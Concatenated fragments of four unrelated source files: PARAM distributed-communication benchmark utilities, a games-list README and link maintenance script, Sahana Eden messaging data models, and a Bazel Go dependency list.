commsParams.quant_a2a_embedding_dim
* world_size
* commsParams.element_size
)
elif (commsParams.collective == "all_reduce") or (
commsParams.collective == "reduce"
):
if commsParams.beginSize < commsParams.element_size:
commsParams.beginSize = commsParams.element_size
def get_rank_details(backendFuncs):
local_rank = backendFuncs.get_local_rank()
global_rank = backendFuncs.get_global_rank()
world_size = backendFuncs.get_world_size()
group = backendFuncs.get_default_group()
curDevice = backendFuncs.get_device()
curHwDevice = backendFuncs.get_hw_device()
return (local_rank, global_rank, world_size, group, curDevice, curHwDevice)
def env2int(env_list, default=-1):
for e in env_list:
val = int(os.environ.get(e, -1))
if val >= 0:
return val
return default
def read_comms_env_vars():
world_size = env2int(
["MV2_COMM_WORLD_SIZE", "OMPI_COMM_WORLD_SIZE", "PMI_SIZE", "WORLD_SIZE"], -1
)
local_size = env2int(
[
"LOCAL_SIZE",
"MPI_LOCALNRANKS",
"MV2_COMM_WORLD_LOCAL_SIZE",
"OMPI_COMM_WORLD_LOCAL_SIZE",
],
-1,
)
global_rank = env2int(
["MV2_COMM_WORLD_RANK", "OMPI_COMM_WORLD_RANK", "PMI_RANK", "RANK"], -1
)
local_rank = env2int(
[
"LOCAL_RANK",
"MPI_LOCALRANKID",
"MV2_COMM_WORLD_LOCAL_RANK",
"OMPI_COMM_WORLD_LOCAL_RANK",
],
-1,
)
comms_env_params = {}
comms_env_params["world_size"] = world_size
comms_env_params["local_size"] = local_size
comms_env_params["global_rank"] = global_rank
comms_env_params["local_rank"] = local_rank
return comms_env_params
def commonUrlRead(remotePath):
import urllib.request
# TODO: Error handle
with urllib.request.urlopen(remotePath) as rf:
contents = rf.read()
return StringIO(contents.decode("utf-8"))
def initQuantCommCtx(collectiveArgs, commsParams):
logger.info(f"communication bitwidth set to {commsParams.bitwidth}")
try:
from internals import initialize_collectiveArgs_internal
initialize_collectiveArgs_internal(collectiveArgs, commsParams)
except ImportError:
# cannot do quantization, reset bitwidth
logger.warning("quantization not supported, disabled and continue...")
commsParams.bitwidth = 32
pass
def checkQuantArgs(collective, dtype, beginSize, quant_a2a_embedding_dim, blockingFlag):
if collective not in (
"all_to_all",
"all_to_allv",
"reduce",
"all_reduce",
):
raise NotImplementedError(
f"quantized communication for {collective} is currently unsupported."
)
if collective in ("all_to_all", "all_to_allv"):
if (beginSize // 4) % quant_a2a_embedding_dim != 0:
logger.warning(
f"begin size {beginSize} must be a multiple of --quant-a2a-embedding-dim {quant_a2a_embedding_dim} for all_to_all operation"
)
if blockingFlag != 1:
raise NotImplementedError("quantized All_to_all must be synchronous.")
if dtype != torch.float32:
raise NotImplementedError(
f"quantization for {dtype} is not supported. Use float32 instead."
)
def clearQuantCommCtx(collectiveArgs):
try:
logger.debug("Removing installed quantization handlers.")
from internals import remove_quantization_handlers
remove_quantization_handlers(collectiveArgs)
except ImportError:
pass
def paramToCommName(name, supported_comms=None):
"""
Map any possible creative collective names to the internal name
Validate the `name` if `supported_comms` is providedd
"""
name_aliases = {
"alltoall": "all_to_all",
"alltoallv": "all_to_allv",
"alltoallbase": "all_to_allv",
"allreduce": "all_reduce",
"allgather": "all_gather",
"allgatherbase": "all_gather_base",
"reducescatter": "reduce_scatter",
"recvanysource": "recv",
}
new_name = name.lower()
new_name = "".join(x for x in new_name if x.isalpha())
if new_name in name_aliases:
new_name = name_aliases[new_name]
else:
new_name = name
if supported_comms is not None and new_name not in supported_comms:
gracefulExit(
f"{name} is not a supported communication in PARAM! Supported comms: {supported_comms}"
)
return new_name
def ensureTensorFlush(tensors):
x = None
if isinstance(tensors, list) and len(tensors) > 0:
# some collectives like allgather use a list of tensors
x = tensors[-1][-1].item() # to ensure collective won't be optimized away.
elif isinstance(tensors, torch.Tensor) and tensors.nelement() > 0:
x = tensors[-1].item() # to ensure collective won't be optimized away.
return x
@dataclass
class paramTimer:
elapsedTimeNS: float = 0.0 # keeping time in NS
def reset(self, newTime=0.0):
self.elapsedTimeNS = newTime
def incrTimeNS(self, timeNS):
self.elapsedTimeNS += timeNS
def getTimeUS(self) -> float:
return self.elapsedTimeNS / 1e3
def getTimeNS(self) -> float:
return self.elapsedTimeNS
class paramProfile(record_function):
"""Inherit from PyTorch profiler to enable autoguard profiling while measuring the time interval in PARAM"""
def __init__(self, timer=None, description=""):
self.description = description
self.timer = timer
super().__init__(name=description)
def __enter__(self):
super().__enter__()
self.start = time.monotonic()
return self
def __exit__(self, exc_type, exc_value, traceback):
self.end = time.monotonic()
self.intervalNS = (self.end - self.start) * 1e9 # keeping time in NS
# if given a valid paramTimer object, directly update the measured time interval
if isinstance(self.timer, paramTimer):
self.timer.incrTimeNS(self.intervalNS)
logger.debug(f"{self.description} took {self.intervalNS} ns")
super().__exit__(exc_type, exc_value, traceback)
class backendFunctions(ABC):
"""Abstract base class, provides common abstraction for all the backends."""
def __init__(self):
self.collectiveFunc = {
"all_to_all": self.all_to_all,
"all_to_allv": self.all_to_allv,
"all_reduce": self.all_reduce,
"broadcast": self.broadcast,
"all_gather": self.all_gather,
"all_gather_base": self.all_gather_base,
"reduce": self.reduce,
"reduce_scatter": self.reduce_scatter,
"reduce_scatter_base": self.reduce_scatter_base,
"barrier": self.barrier,
"incast": self.incast,
"multicast": self.multicast,
"noop": self.noop,
}
def getBusBW(self, collective, algBW, collectiveArgs):
busBW = algBW
mulFactor = 1.0
if collective == "all_reduce":
if collectiveArgs.world_size != 0:
mulFactor = (
2 * (collectiveArgs.world_size - 1) / (collectiveArgs.world_size)
)
busBW = algBW * mulFactor
elif collective in (
"all_to_all",
"all_to_allv",
"all_gather",
"reduce_scatter",
"reduce_scatter_base",
"all_gather_base",
):
if collectiveArgs.world_size != 0:
mulFactor = (collectiveArgs.world_size - 1) / (
collectiveArgs.world_size
)
busBW = algBW * mulFactor
elif collective in ("reduce", "broadcast", "incast", "multicast"):
busBW = algBW
else:
logger.error(
f"collective: {collective} is not supported in computing bus BW! "
)
return busBW
def alloc_ones(
self, sizeArr, curRankDevice="cuda", dtype=torch.float32, scaleFactor=1.0
):
ipTensor = torch.ones(sizeArr, device=curRankDevice, dtype=dtype)
if scaleFactor != 1.0:
ipTensor = ipTensor * scaleFactor
return ipTensor
def noop(self, collectiveArgs=None, retFlag=False, pair=False):
"""no-op for the case we want to skip comms/compute"""
pass
@abstractmethod
def sayHello(self, global_rank, local_rank, world_size, master_ip):
pass
# Collectives
@abstractmethod
def all_reduce(self, collectiveArgs, retFlag=False):
pass
@abstractmethod
def reduce(self, collectiveArgs, retFlag=False):
pass
@abstractmethod
def all_to_all(self, collectiveArgs, retFlag=False):
pass
@abstractmethod
def all_to_allv(self, collectiveArgs, retFlag=False):
pass
@abstractmethod
def complete_accel_ops(self, collectiveArgs, initOp=False):
pass
@abstractmethod
def barrier(self, collectiveArgs, name="dummy"):
pass
def sync_barrier(self, collectiveArgs, desc="world"):
self.barrier(collectiveArgs, name=desc)
@abstractmethod
def get_reduce_op(self, opName):
pass
# Compute functions
@abstractmethod
def gemm(self, collectiveArgs):
pass
# Memory related
@abstractmethod
def get_mem_size(self, collectiveArgs):
pass
@abstractmethod
def alloc_random(self, sizeArr, curRankDevice, dtype, scaleFactor=1.0):
pass
@abstractmethod
def alloc_embedding_tables(self, n, m, curRankDevice, dtype):
pass
@abstractmethod
def alloc_empty(self, sizeArr, dtype, curRankDevice):
pass
@abstractmethod
def clear_memory(self, collectiveArgs):
pass
# Getting world-size and other information.
@abstractmethod
def get_local_rank(self):
pass
@abstractmethod
def get_global_rank(self):
pass
@abstractmethod
def get_world_size(self):
pass
@abstractmethod
def get_device(self):
pass
@abstractmethod
def get_hw_device(self):
pass
@abstractmethod
def get_default_group(self):
pass
@abstractmethod
def get_groups(self):
pass
# Init functions
@abstractmethod
def initialize_backend(self, master_ip, master_port, backend="gloo"):
pass
@abstractmethod
def benchmark_comms(self):
pass
class comms_world_info_holder:
def __init__(self, master_ip, master_port, num_tpu_cores, comms_env_params):
# Holding communication-world related parameters.
| |
<gh_stars>0
"""
Runs a series of maintenance operations on the collection of entry files, updating the table of content files for
each category as well as creating a statistics file.
Counts the number of records each sub-folder and updates the overview.
Sorts the entries in the contents files of each sub folder alphabetically.
This script runs with Python 3, it could also with Python 2 with some minor tweaks probably.
"""
import re
import urllib.request
import http.client
import datetime
import json
import textwrap
from utils.utils import *
TOC = '_toc.md'
def get_category_paths():
"""
Returns all sub folders of the games path.
"""
return [os.path.join(games_path, x) for x in os.listdir(games_path) if os.path.isdir(os.path.join(games_path, x))]
def get_entry_paths(category_path):
"""
Returns all files of a category path, except for '_toc.md'.
"""
return [os.path.join(category_path, x) for x in os.listdir(category_path) if x != TOC and os.path.isfile(os.path.join(category_path, x))]
def extract_overview_for_toc(file):
"""
Parses a file for some interesting fields and concatenates the content.
To be displayed after the game name in the category TOCs.
"""
info = infos[file]
output = []
if 'code language' in info:
output.extend(info['code language'])
if 'code license' in info:
output.extend(info['code license'])
# state
if 'state' in info:
output.extend(info['state'])
output = ", ".join(output)
return output
def update_readme():
"""
Recounts entries in sub categories and writes them to the readme.
Also updates the _toc files in the categories directories.
Note: The Readme must have a specific structure at the beginning, starting with "# Open Source Games" and ending
on "A collection.."
Needs to be performed regularly.
"""
print('update readme file')
# read readme
readme_text = read_text(readme_file)
# compile regex for identifying the building blocks
regex = re.compile(r"(.*?)(\[comment\]: # \(start.*?end of autogenerated content\))(.*)", re.DOTALL)
# apply regex
matches = regex.findall(readme_text)
assert len(matches) == 1
matches = matches[0]
start = matches[0]
end = matches[2]
# get sub folders
category_paths = get_category_paths()
# assemble paths
toc_paths = [os.path.join(path, TOC) for path in category_paths]
# get titles (discarding first two ("# ") and last ("\n") characters)
category_titles = [read_first_line(path)[2:-1] for path in toc_paths]
# get number of files (minus 1 for the already existing TOC file) in each sub folder
n_entries = [len(os.listdir(path)) - 1 for path in category_paths]
# combine titles, category names, numbers in one list
info = zip(category_titles, [os.path.basename(path) for path in category_paths], n_entries)
# sort according to sub category title (should be unique)
info = sorted(info, key=lambda x:x[0])
# assemble output
update = ['- **[{}](games/{}/{})** ({})\n'.format(entry[0], entry[1], TOC, entry[2]) for entry in info]
update = "{} entries\n".format(sum(n_entries)) + "".join(update)
# insert new text in the middle
text = start + "[comment]: # (start of autogenerated content, do not edit)\n" + update + "\n[comment]: # (end of autogenerated content)" + end
# write to readme
write_text(readme_file, text)
def update_category_tocs():
"""
Lists all entries in all sub folders and generates the list in the toc file.
Needs to be performed regularly.
"""
# get category paths
category_paths = get_category_paths()
# for each category
for category_path in category_paths:
print('generate toc for {}'.format(os.path.basename(category_path)))
# read toc header line
toc_file = os.path.join(category_path, TOC)
toc_header = read_first_line(toc_file) # stays as is
# get paths of all entries in this category
entry_paths = get_entry_paths(category_path)
# get titles (discarding first two ("# ") and last ("\n") characters)
titles = [read_first_line(path)[2:-1] for path in entry_paths]
# get more interesting info
more = [extract_overview_for_toc(path) for path in entry_paths]
# combine name, file name and more info
info = zip(titles, [os.path.basename(path) for path in entry_paths], more)
# sort according to entry title (should be unique)
info = sorted(info, key=lambda x:x[0])
# assemble output
update = ['- **[{}]({})** ({})\n'.format(*entry) for entry in info]
update = "".join(update)
# combine with toc header
text = toc_header + '\n' + "[comment]: # (start of autogenerated content, do not edit)\n" + update + "\n[comment]: # (end of autogenerated content)"
# write to toc file
with open(toc_file, mode='w', encoding='utf-8') as f:
f.write(text)
def check_validity_external_links():
"""
Checks all external links it can find for validity. Prints those with non OK HTTP responses. Does only need to be run
from time to time.
"""
# regex for finding urls (can be in <> or in () or a whitespace
regex = re.compile(r"[\s\n]<(http.+?)>|\]\((http.+?)\)|[\s\n](http[^\s\n,]+)")
# count
number_checked_links = 0
# get category paths
category_paths = get_category_paths()
# for each category
for category_path in category_paths:
print('check links for {}'.format(os.path.basename(category_path)))
# get entry paths
entry_paths = get_entry_paths(category_path)
# for each entry
for entry_path in entry_paths:
# read entry
content = read_text(entry_path)
# apply regex
matches = regex.findall(content)
# for each match
for match in matches:
# for each possible clause
for url in match:
# if there was something
if url:
try:
# without a special header, frequent 403 responses occur
req = urllib.request.Request(url, headers={'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64)'})
urllib.request.urlopen(req)
except urllib.error.HTTPError as e:
print("{}: {} - {}".format(os.path.basename(entry_path), url, e.code))
except urllib.error.URLError as e:
print("{}: {} - {}".format(os.path.basename(entry_path), url, e.reason))
except http.client.RemoteDisconnected:
print("{}: {} - disconnected without response".format(os.path.basename(entry_path), url))
number_checked_links += 1
if number_checked_links % 50 == 0:
print("{} links checked".format(number_checked_links))
print("{} links checked".format(number_checked_links))
def check_template_leftovers():
"""
Checks for template leftovers.
Should be run only occasionally.
"""
# load template and get all lines
text = read_text(os.path.join(games_path, 'template.md'))
text = text.split('\n')
check_strings = [x for x in text if x and not x.startswith('##')]
# get category paths
category_paths = get_category_paths()
# for each category
for category_path in category_paths:
# get paths of all entries in this category
entry_paths = get_entry_paths(category_path)
for entry_path in entry_paths:
# read it line by line
content = read_text(entry_path)
for check_string in check_strings:
if content.find(check_string) >= 0:
print('{}: found {}'.format(os.path.basename(entry_path), check_string))
def parse_entry(content):
"""
Returns a dictionary of the features of the content
"""
info = {}
# read title
regex = re.compile(r"^# (.*)") # start of content, starting with "# " and then everything until the end of line
matches = regex.findall(content)
assert len(matches) == 1
assert matches[0]
info['title'] = matches[0]
# read description
regex = re.compile(r"^.*\n\n_(.*)_\n") # third line from top, everything between underscores
matches = regex.findall(content)
assert len(matches) == 1, info['title']
assert matches[0]
info['description'] = matches[0]
# first read all field names
regex = re.compile(r"^- (.*?): ", re.MULTILINE) # start of each line having "- ", then everything until a colon, then ": "
fields = regex.findall(content)
# check that essential fields are there
essential_fields = ['Home', 'State', 'Code repository', 'Code language']
for field in essential_fields:
if field not in fields:
print('Error: Essential field "{}" missing in entry "{}"'.format(field, info['title']))
return info # so that the remaining entries can also be parsed
# check that all fields are valid fields and are existing in that order
valid_fields = ('Home', 'Media', 'State', 'Play', 'Download', 'Platform', 'Keywords', 'Code repository', 'Code language', 'Code license', 'Code dependencies', 'Assets license', 'Build system', 'Build instructions')
index = 0
for field in fields:
while index < len(valid_fields) and field != valid_fields[index]:
index += 1
if index == len(valid_fields):
print('Error: Field "{}" in entry "{}" either misspelled or in wrong order'.format(field, info['title']))
return info # so that the remaining entries can also be parsed
# iterate over found fields
for field in fields:
regex = re.compile(r"- {}: (.*)".format(field))
matches = regex.findall(content)
assert len(matches) == 1 # every field should only be present once
v = matches[0]
# first store as is
info[field.lower()+'-raw'] = v
# remove parenthesis
v = re.sub(r'\([^)]*\)', '', v)
# split on ','
v = v.split(',')
# strip
v = [x.strip() for x in v]
# remove all being false (empty)
v = [x for x in v if x]
# if entry is of structure <..> remove <>
v = [x[1:-1] if x[0] is '<' and x[-1] is '>' else x for x in v]
# empty fields will not be stored
if not v:
continue
# store in info
info[field.lower()] = v
# state (essential field) must contain either beta or mature but not both, but at least one
v = info['state']
| |
<reponame>ptressel/sahana-eden-madpub
# -*- coding: utf-8 -*-
"""
Messaging module
"""
module = "msg"
if deployment_settings.has_module(module):
# Settings
resourcename = "setting"
tablename = "%s_%s" % (module, resourcename)
table = db.define_table(tablename,
Field("outgoing_sms_handler"),
# Moved to deployment_settings
#Field("default_country_code", "integer", default=44),
migrate=migrate)
table.outgoing_sms_handler.requires = IS_IN_SET(["Modem", "Gateway", "Tropo"], zero=None)
#------------------------------------------------------------------------
resourcename = "email_settings"
tablename = "%s_%s" % (module, resourcename)
table = db.define_table(tablename,
Field("inbound_mail_server"),
Field("inbound_mail_type"),
Field("inbound_mail_ssl", "boolean"),
Field("inbound_mail_port", "integer"),
Field("inbound_mail_username"),
Field("inbound_mail_password"),
Field("inbound_mail_delete", "boolean"),
# Also needs to be used by Auth (order issues), DB calls are overheads
# - as easy for admin to edit source in 000_config.py as to edit DB (although an admin panel can be nice)
#Field("outbound_mail_server"),
#Field("outbound_mail_from"),
migrate=migrate)
table.inbound_mail_type.requires = IS_IN_SET(["imap", "pop3"], zero=None)
#------------------------------------------------------------------------
resourcename = "modem_settings"
tablename = "%s_%s" % (module, resourcename)
table = db.define_table(tablename,
#Field("account_name"), # Nametag to remember account - To be used later
Field("modem_port"),
Field("modem_baud", "integer", default = 115200),
Field("enabled", "boolean", default = False),
#Field("preference", "integer", default = 5), To be used later
migrate=migrate)
#------------------------------------------------------------------------
resourcename = "gateway_settings"
tablename = "%s_%s" % (module, resourcename)
table = db.define_table(tablename,
Field("url",
default = "https://api.clickatell.com/http/sendmsg"),
Field("parameters",
default="user=yourusername&password=<PASSWORD>&api_id=yourapiid"),
Field("message_variable", "string", default = "text"),
Field("to_variable", "string", default = "to"),
Field("enabled", "boolean", default = False),
#Field("preference", "integer", default = 5), To be used later
migrate=migrate)
#------------------------------------------------------------------------
resourcename = "tropo_settings"
tablename = "%s_%s" % (module, resourcename)
table = db.define_table(tablename,
Field("token_messaging"),
#Field("token_voice"),
migrate=migrate)
#------------------------------------------------------------------------
resourcename = "twitter_settings"
tablename = "%s_%s" % (module, resourcename)
table = db.define_table(tablename,
Field("pin"),
Field("oauth_key"),
Field("oauth_secret"),
Field("twitter_account"),
migrate=migrate)
table.oauth_key.writable = False
table.oauth_secret.writable = False
### comment these 2 when debugging
table.oauth_key.readable = False
table.oauth_secret.readable = False
table.twitter_account.writable = False
def twitter_settings_onvalidation(form):
""" Complete oauth: take tokens from session + pin from form, and do the 2nd API call to Twitter """
if form.vars.pin and session.s3.twitter_request_key and session.s3.twitter_request_secret:
try:
import tweepy
except:
raise HTTP(501, body=T("Can't import tweepy"))
oauth = tweepy.OAuthHandler(deployment_settings.twitter.oauth_consumer_key,
deployment_settings.twitter.oauth_consumer_secret)
oauth.set_request_token(session.s3.twitter_request_key, session.s3.twitter_request_secret)
try:
oauth.get_access_token(form.vars.pin)
form.vars.oauth_key = oauth.access_token.key
form.vars.oauth_secret = oauth.access_token.secret
twitter = tweepy.API(oauth)
form.vars.twitter_account = twitter.me().screen_name
form.vars.pin = "" # we won't need it anymore
return
except tweepy.TweepError:
session.error = T("Settings were reset because authenticating with Twitter failed")
# Either user asked to reset, or error - clear everything
for k in ["oauth_key", "oauth_secret", "twitter_account"]:
form.vars[k] = None
for k in ["twitter_request_key", "twitter_request_secret"]:
session.s3[k] = ""
s3xrc.model.configure(table, onvalidation=twitter_settings_onvalidation)
#------------------------------------------------------------------------
# Message priority
msg_priority_opts = {
3:T("High"),
2:T("Medium"),
1:T("Low")
}
#------------------------------------------------------------------------
# Message Log - This is where all the messages / logs go into
resourcename = "log"
tablename = "%s_%s" % (module, resourcename)
table = db.define_table(tablename,
super_link(db.pr_pentity), # pe_id, Sender
Field("sender"), # The name to go out incase of the email, if set used
Field("fromaddress"), # From address if set changes sender to this
Field("recipient"),
Field("subject", length=78),
Field("message", "text"),
#Field("attachment", "upload", autodelete = True), #TODO
Field("verified", "boolean", default = False),
Field("verified_comments", "text"),
Field("actionable", "boolean", default = True),
Field("actioned", "boolean", default = False),
Field("actioned_comments", "text"),
# Hide until actually wired-up for something
#Field("priority", "integer", default = 1),
Field("inbound", "boolean", default = False),
migrate=migrate,
*(s3_timestamp() + s3_uid() + s3_deletion_status()))
table.uuid.requires = IS_NOT_ONE_OF(db, "%s.uuid" % tablename)
#table.priority.requires = IS_NULL_OR(IS_IN_SET(msg_priority_opts))
#table.priority.label = T("Priority")
table.inbound.label = T("Direction")
table.inbound.represent = lambda direction: (direction and ["In"] or ["Out"])[0]
#@ToDo More Labels for i18n
s3xrc.model.configure(table,
list_fields=["id",
"inbound",
"pe_id",
"fromaddress",
"recipient",
"subject",
"message",
"verified",
#"verified_comments",
"actionable",
"actioned",
#"actioned_comments",
#"priority"
])
# Reusable Message ID
message_id = S3ReusableField("message_id", db.msg_log,
requires = IS_NULL_OR(IS_ONE_OF(db, "msg_log.id")),
# FIXME: Subject works for Email but not SMS
represent = lambda id: db(db.msg_log.id == id).select(db.msg_log.subject,
limitby=(0, 1)).first().subject,
ondelete = "RESTRICT"
)
#------------------------------------------------------------------------
# Message Tag - Used to tag a message to a resource
resourcename = "tag"
tablename = "%s_%s" % (module, resourcename)
table = db.define_table(tablename,
message_id(),
Field("resource"),
Field("record_uuid", # null in this field implies subscription to the entire resource
type=s3uuid,
length=128),
migrate=migrate,
*(s3_timestamp() + s3_uid() + s3_deletion_status()))
table.uuid.requires = IS_NOT_ONE_OF(db, "%s.uuid" % tablename)
s3xrc.model.configure(table,
list_fields=[ "id",
"message_id",
"record_uuid",
"resource",
])
#------------------------------------------------------------------------
# Twitter Search Queries
resourcename = "twitter_search"
tablename = "%s_%s" % (module, resourcename)
table = db.define_table(tablename,
Field("search_query", length = 140),
migrate = migrate
)
#------------------------------------------------------------------------
# Twitter Search Results
resourcename = "twitter_search_results"
tablename = "%s_%s" % (module, resourcename)
table = db.define_table(tablename,
Field("tweet", length=140),
Field("posted_by"),
Field("posted_at"),
Field("twitter_search", db.msg_twitter_search),
migrate = migrate
)
#table.twitter_search.requires = IS_ONE_OF(db, "twitter_search.search_query")
#table.twitter_search.represent = lambda id: db(db.msg_twitter_search.id == id).select(db.msg_twitter_search.search_query, limitby = (0,1)).first().search_query
s3xrc.model.add_component(module, resourcename,
multiple=True,
joinby=dict(msg_twitter_search="twitter_search"))
s3xrc.model.configure(table,
list_fields=[ "id",
"tweet",
"posted_by",
"posted_at",
"twitter_search",
])
#------------------------------------------------------------------------
# The following was added to show only the supported messaging methods
msg_contact_method_opts = { # pr_contact_method dependency
1:T("Email"),
2:T("Mobile Phone"),
#3:T("XMPP"),
4:T("Twitter"),
}
# Channel - For inbound messages this tells which channel the message came in from.
resourcename = "channel"
tablename = "%s_%s" % (module, resourcename)
table = db.define_table(tablename,
message_id(),
Field("pr_message_method", "integer",
requires = IS_IN_SET(msg_contact_method_opts, zero=None),
default = 1),
Field("log"),
migrate=migrate,
*(s3_timestamp() + s3_uid() + s3_deletion_status()))
#------------------------------------------------------------------------
# Status
resourcename = "email_inbound_status"
tablename = "%s_%s" % (module, resourcename)
table = db.define_table(tablename,
Field("status"),
migrate=migrate)
# Valid message outbox statuses
msg_status_type_opts = {
1:T("Unsent"),
2:T("Sent"),
3:T("Draft"),
4:T("Invalid")
}
opt_msg_status = db.Table(None, "opt_msg_status",
Field("status", "integer", notnull=True,
requires = IS_IN_SET(msg_status_type_opts, zero=None),
default = 1,
label = T("Status"),
represent = lambda opt: msg_status_type_opts.get(opt, UNKNOWN_OPT)))
# Outbox - needs to be separate to Log since a single message sent needs different outbox entries for each recipient
resourcename = "outbox"
tablename = "%s_%s" % (module, resourcename)
table = db.define_table(tablename,
message_id(),
super_link(db.pr_pentity), # pe_id, Person/Group to send the message out to
Field("address"), # If set used instead of picking up from pe_id
Field("pr_message_method", "integer",
requires = IS_IN_SET(msg_contact_method_opts, zero=None),
default = 1,
label = T("Contact Method"),
represent = lambda opt: msg_contact_method_opts.get(opt, UNKNOWN_OPT)),
opt_msg_status,
Field("system_generated", "boolean", default = False),
Field("log"),
migrate=migrate,
*(s3_timestamp() + s3_uid() + s3_deletion_status()))
s3xrc.model.add_component(module, resourcename,
multiple=True,
joinby=dict(msg_log="message_id"))
table.uuid.requires = IS_NOT_ONE_OF(db, "%s.uuid" % tablename)
s3xrc.model.configure(table,
list_fields=[ "id",
"message_id",
"pe_id",
"status",
"log",
])
# Message Read Status - To replace Message Outbox #TODO
resourcename = "read_status"
tablename = "%s_%s" % (module, resourcename)
table = db.define_table(tablename,
message_id(),
person_id(),
migrate=migrate,
*(s3_timestamp() + s3_uid() + s3_deletion_status()))
table.uuid.requires = IS_NOT_ONE_OF(db, "%s.uuid" % tablename)
s3xrc.model.configure(table,
list_fields=[ "id",
"message_id",
"person_id",
])
#------------------------------------------------------------------------
# Tropo Scratch pad for outbound messaging
resourcename = "tropo_scratch"
tablename = "%s_%s" % (module, resourcename)
table = db.define_table(tablename,
Field("row_id","integer"),
Field("message_id","integer"),
Field("recipient"),
Field("message"),
Field("network"),
migrate=migrate,
*(s3_timestamp() + s3_uid() + s3_deletion_status()))
table.uuid.requires = IS_NOT_ONE_OF(db, "%s.uuid" % tablename)
# SMS store for persistence and scratch pad for combining incoming xform chunks
resourcename = "xforms_store"
tablename = "%s_%s" % (module, resourcename)
table = db.define_table(tablename,
Field("sender", "string", length = 20),
Field("fileno", "integer"),
Field("totalno", "integer"),
Field("partno", "integer"),
Field("message", "string", length = 160),
migrate=migrate)
#------------------------------------------------------------------------
# CAP: Common Alerting Protocol
# http://docs.oasis-open.org/emergency/cap/v1.2/CAP-v1.2.html
# CAP alert Status Code (status)
cap_alert_status_code_opts = {
"Actual":T("Actionable by all targeted recipients"),
"Exercise":T("Actionable only by designated exercise participants; exercise identifier SHOULD appear in <note>"),
"System":T("For messages that support alert network internal functions"),
"Test":T("Technical testing only, all recipients disregard"),
"Draft":T("preliminary template or draft, not actionable in its current form"),
}
# CAP info Event Category (category)
cap_info_category_opts = {
"Geo":T("Geophysical (inc. landslide)"),
"Met":T("Meteorological (inc. flood)"),
"Safety":T("General emergency and public safety"),
"Security":T("Law enforcement, military, homeland and local/private security"),
"Rescue":T("Rescue and recovery"),
"Fire":T("Fire suppression and rescue"),
"Health":T("Medical and public health"),
"Env":T("Pollution and other environmental"),
"Transport":T("Public and private transportation"),
"Infra":T("Utility, telecommunication, other non-transport infrastructure"),
"CBRNE":T("Chemical, Biological, Radiological, Nuclear or High-Yield Explosive threat or attack"),
"Other":T("Other events"),
}
# CAP info Response Type (responseType)
cap_info_responseType_opts = {
"Shelter":T("Take shelter in place or per <instruction>"),
"Evacuate":T("Relocate as instructed in the <instruction>"),
"Prepare":T("Make preparations per the <instruction>"),
"Execute":T("Execute a pre-planned activity identified in <instruction>"),
"Avoid":T("Avoid the subject event as per the <instruction>"),
"Monitor":T("Attend to information sources as described in <instruction>"),
"Assess":T("Evaluate the information in this message. (This value SHOULD NOT be used in public warning applications.)"),
"AllClear":T("The subject event no longer poses a threat or concern and any follow on action is described in <instruction>"),
"None":T("No action recommended"),
}
# Reports
# Verified reports ready to be sent out as alerts or displayed on a map
| |
"h1:/M4H/1G4avsieL6BbUwCOBzulmoeKVP5ux/3mQNnbyI=",
version = "v1.1.0",
)
go_repository(
name = "com_github_masterminds_goutils",
importpath = "github.com/Masterminds/goutils",
sum = "h1:zukEsf/1JZwCMgHiK3GZftabmxiCw4apj3a28RPBiVg=",
version = "v1.1.0",
)
go_repository(
name = "com_github_masterminds_semver_v3",
importpath = "github.com/Masterminds/semver/v3",
sum = "h1:Y2lUDsFKVRSYGojLJ1yLxSXdMmMYTYls0rCvoqmMUQk=",
version = "v3.1.0",
)
go_repository(
name = "com_github_masterminds_sprig_v3",
importpath = "github.com/Masterminds/sprig/v3",
sum = "h1:j7GpgZ7PdFqNsmncycTHsLmVPf5/3wJtlgW9TNDYD9Y=",
version = "v3.1.0",
)
go_repository(
name = "com_github_masterminds_squirrel",
importpath = "github.com/Masterminds/squirrel",
sum = "h1:K1NhbTO21BWG47IVR0OnIZuE0LZcXAYqywrC3Ko53KI=",
version = "v1.2.0",
)
go_repository(
name = "com_github_masterminds_vcs",
importpath = "github.com/Masterminds/vcs",
sum = "h1:NL3G1X7/7xduQtA2sJLpVpfHTNBALVNSjob6KEjPXNQ=",
version = "v1.13.1",
)
go_repository(
name = "com_github_mattn_go_colorable",
importpath = "github.com/mattn/go-colorable",
sum = "h1:/bC9yWikZXAL9uJdulbSfyVNIR3n3trXl+v8+1sx8mU=",
version = "v0.1.2",
)
go_repository(
name = "com_github_mattn_go_ieproxy",
importpath = "github.com/mattn/go-ieproxy",
sum = "h1:YioO2TiJyAHWHyCRQCP8jk5IzTqmsbGc5qQPIhHo6xs=",
version = "v0.0.0-20191113090002-7c0f6868bffe",
)
go_repository(
name = "com_github_mattn_go_isatty",
importpath = "github.com/mattn/go-isatty",
sum = "h1:wuysRhFDzyxgEmMf5xjvJ2M9dZoWAXNNr5LSBS7uHXY=",
version = "v0.0.12",
)
go_repository(
name = "com_github_mattn_go_runewidth",
importpath = "github.com/mattn/go-runewidth",
sum = "h1:V2iyH+aX9C5fsYCpK60U8BYIvmhqxuOL3JZcqc1NB7k=",
version = "v0.0.6",
)
go_repository(
name = "com_github_mattn_go_shellwords",
importpath = "github.com/mattn/go-shellwords",
sum = "h1:Y7Xqm8piKOO3v10Thp7Z36h4FYFjt5xB//6XvOrs2Gw=",
version = "v1.0.10",
)
go_repository(
name = "com_github_mattn_go_sqlite3",
importpath = "github.com/mattn/go-sqlite3",
sum = "h1:u/x3mp++qUxvYfulZ4HKOvVO0JWhk7HtE8lWhbGz/Do=",
version = "v1.12.0",
)
go_repository(
name = "com_github_matttproud_golang_protobuf_extensions",
importpath = "github.com/matttproud/golang_protobuf_extensions",
sum = "h1:I0XW9+e1XWDxdcEniV4rQAIOPUGDq67JSCiRCgGCZLI=",
version = "v1.0.2-0.20181231171920-c182affec369",
)
go_repository(
name = "com_github_maxbrunsfeld_counterfeiter_v6",
importpath = "github.com/maxbrunsfeld/counterfeiter/v6",
sum = "h1:g+4J5sZg6osfvEfkRZxJ1em0VT95/UOZgi/l7zi1/oE=",
version = "v6.2.2",
)
go_repository(
name = "com_github_microsoft_go_winio",
importpath = "github.com/Microsoft/go-winio",
sum = "h1:ygIc8M6trr62pF5DucadTWGdEB4mEyvzi0e2nbcmcyA=",
version = "v0.4.15-0.20190919025122-fc70bd9a86b5",
)
go_repository(
name = "com_github_microsoft_hcsshim",
importpath = "github.com/Microsoft/hcsshim",
sum = "h1:VrfodqvztU8YSOvygU+DN1BGaSGxmrNfqOv5oOuX2Bk=",
version = "v0.8.9",
)
go_repository(
name = "com_github_miekg_dns",
importpath = "github.com/miekg/dns",
